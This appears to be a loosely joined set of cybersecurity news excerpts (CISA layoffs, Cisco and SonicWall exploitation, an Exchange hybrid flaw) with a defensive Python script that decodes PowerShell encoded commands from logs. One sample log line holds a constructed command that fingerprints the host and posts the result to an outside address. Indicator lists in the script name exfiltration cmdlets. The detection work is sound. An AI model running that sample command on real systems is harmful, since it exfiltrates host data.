Staff within the Stakeholder Engagement Division, as well as the cyber-defense agency's Infrastructure Security Division, were targeted with reduction-in-force notices, or RIFs, said the people. OMB Director Russ Vought announced the actions on Friday in line with Trump administration promises to enact layoffs during the ongoing government shutdown. The Integrated Operations Division is also believed to have been impacted, one of the people said.
The CISA law, meaning the Cybersecurity Information Sharing Act of 2015 rather than the agency that shares its acronym, was due for renewal along with the federal government's continuing funding resolution, but given the Senate's inability to pass it and the government shutdown that followed, Sens. Peters and Rounds want it extended without having to wait for the government to reopen. The CISA law, for those unfamiliar, establishes a framework and legal protections for companies to share threat indicators with the government and with each other.
Bloomberg reported Wednesday that the department moved staffers from the U.S. cybersecurity agency CISA, many of whom focus on issuing cyber guidance to help U.S. government agencies and critical infrastructure defend from cyber threats, to other agencies within the federal department, including Immigration and Customs Enforcement (ICE) and Customs and Border Protection (CBP). Both Bloomberg and Nextgov reported that many of the affected CISA staffers are in the agency's Capacity Building unit, which helps to improve the cybersecurity posture of federal agencies,
The Cybersecurity and Infrastructure Security Agency is ordering federal agencies to patch Cisco devices that have been exploited by an advanced hacker group, it said in a Thursday alert. The hacking activity targeting the devices "is widespread and involves exploiting zero-day vulnerabilities to gain unauthenticated remote code execution" on Cisco Adaptive Security Appliance (ASA) devices, CISA said. A "zero-day" is a flaw that attackers are already exploiting before the vendor knows of it or has a fix available, so the vendor has had zero days to patch it.
The update comes about two months after Google warned that some unknown criminals have been exploiting fully patched, end-of-life SonicWall SMA 100 appliances to deploy a previously unknown backdoor and rootkit dubbed OVERSTEP. The malware modifies the appliance's boot process to maintain persistent access, enabling the criminals to steal sensitive credentials and conceal their own components. The Chocolate Factory's intel analysts in July attributed the ongoing campaign to UNC6148 - UNC in Google's threat-group naming taxonomy stands for "Uncategorized."
CVE-2025-53786 is an elevation-of-privilege bug that Dirk-jan Mollema of Outsider Security reported to Microsoft. It exists because hybrid Exchange deployments, which connect on-premises Exchange servers to Exchange Online, have authenticated between the two environments using a single shared service principal, so whoever controls that identity on the on-premises side is trusted by the cloud side as well.
CISA analysed six files: two Dynamic-Link Library (.DLL) files, one cryptographic key stealer, and three web shells. Cyber threat actors could leverage this malware to steal cryptographic keys and execute a Base64-encoded PowerShell command to fingerprint the host system and exfiltrate data.
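One check a defender wants after a report like this, as an added example that is not part of CISA's analysis or of the original article: PowerShell's -EncodedCommand switch takes Base64 over UTF-16LE text, so a process-creation log shows only the blob and nothing greps for "whoami" or "Invoke-WebRequest" until it is decoded. The Python below decodes the blob from constructed sample log lines, tolerates malformed blobs, and flags decoded scripts that contain host-fingerprinting or upload indicators. The log format, the indicator lists, the IP address and the sample lines are all assumptions of this example, not strings from CISA's report.

```python
import base64
import binascii
import re

# Matches the -EncodedCommand switch and the abbreviations PowerShell accepts
# (-e, -ec, -enc), followed by the Base64 blob. Longest alternative first so
# "-enc" is not consumed as "-e" + garbage; case-insensitive because
# PowerShell parameters are. "-ExecutionPolicy" does not match: "-e" must
# be followed by whitespace.
ENCODED_SWITCH = re.compile(
    r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/]+=*)", re.IGNORECASE
)

# Indicator lists are this example's own assumption about what host
# fingerprinting and data exfiltration typically look like in PowerShell.
INDICATORS = {
    "fingerprint": ("hostname", "whoami", "systeminfo", "Get-ComputerInfo",
                    "Get-WmiObject", "Get-CimInstance", "$env:COMPUTERNAME"),
    "exfiltration": ("Invoke-WebRequest", "Invoke-RestMethod", "Net.WebClient",
                     "UploadString", "UploadData", "Start-BitsTransfer"),
}


def powershell_encode(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script carried by an encoded-command switch, or None
    when the command line has no such switch or the blob is not valid
    Base64/UTF-16LE (a malformed blob is worth logging on its own)."""
    m = ENCODED_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def classify(script: str):
    """Return the set of indicator categories present in a decoded script."""
    lowered = script.lower()
    return {cat for cat, needles in INDICATORS.items()
            if any(n.lower() in lowered for n in needles)}


def scan(log_lines):
    """Return (line_no, sorted categories, decoded script) for every line whose
    encoded command matches at least one indicator category."""
    findings = []
    for line_no, line in enumerate(log_lines, 1):
        script = decode_encoded_command(line)
        if script is None:
            continue
        cats = classify(script)
        if cats:
            findings.append((line_no, sorted(cats), script))
    return findings


# Constructed sample process-creation log lines (not from any real incident).
# Format assumed here: "timestamp|parent process|command line".
SAMPLE_LOG = [
    "2025-07-21T10:01:02Z|w3wp.exe|powershell.exe -nop -w hidden -enc "
    + powershell_encode('$h=hostname; $u=whoami; Invoke-WebRequest '
                        '-Uri http://203.0.113.7/c -Method POST -Body "$h,$u"'),
    "2025-07-21T10:02:15Z|explorer.exe|powershell.exe -ExecutionPolicy Bypass "
    "-File C:\\scripts\\backup.ps1",
    "2025-07-21T10:03:40Z|services.exe|powershell.exe -EncodedCommand "
    + powershell_encode("Get-Service | Where-Object Status -eq Stopped"),
    "2025-07-21T10:04:05Z|w3wp.exe|powershell.exe -e not_base64!!",
]

if __name__ == "__main__":
    for line_no, cats, script in scan(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(cats)} -> {script}")
```

Only the first sample line is reported: it decodes to a script that both fingerprints the host and posts the result outward. The benign encoded line decodes cleanly but matches no indicator, the plain -File invocation has no blob, and the malformed blob is rejected rather than crashing the scan.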
In an Exchange hybrid deployment, an attacker who first gains administrative access to an on-premises Exchange server could potentially escalate privileges within the organization's connected cloud environment without leaving easily detectable and auditable traces.
Achieving better memory safety demands language-level protections, library support, robust tooling, and developer training, because memory-unsafe languages such as C and C++ cannot rule out whole classes of bugs (buffer overflows, use-after-free) by construction the way memory-safe languages can.
For anyone who still has doubts about MFA: just ask Snowflake CISO Brad Jones, who last year saw more than 160 of his customers' accounts compromised using stolen credentials. None of those accounts had MFA enabled, and that one safeguard likely would have stopped the intruders from reaching the customers' databases.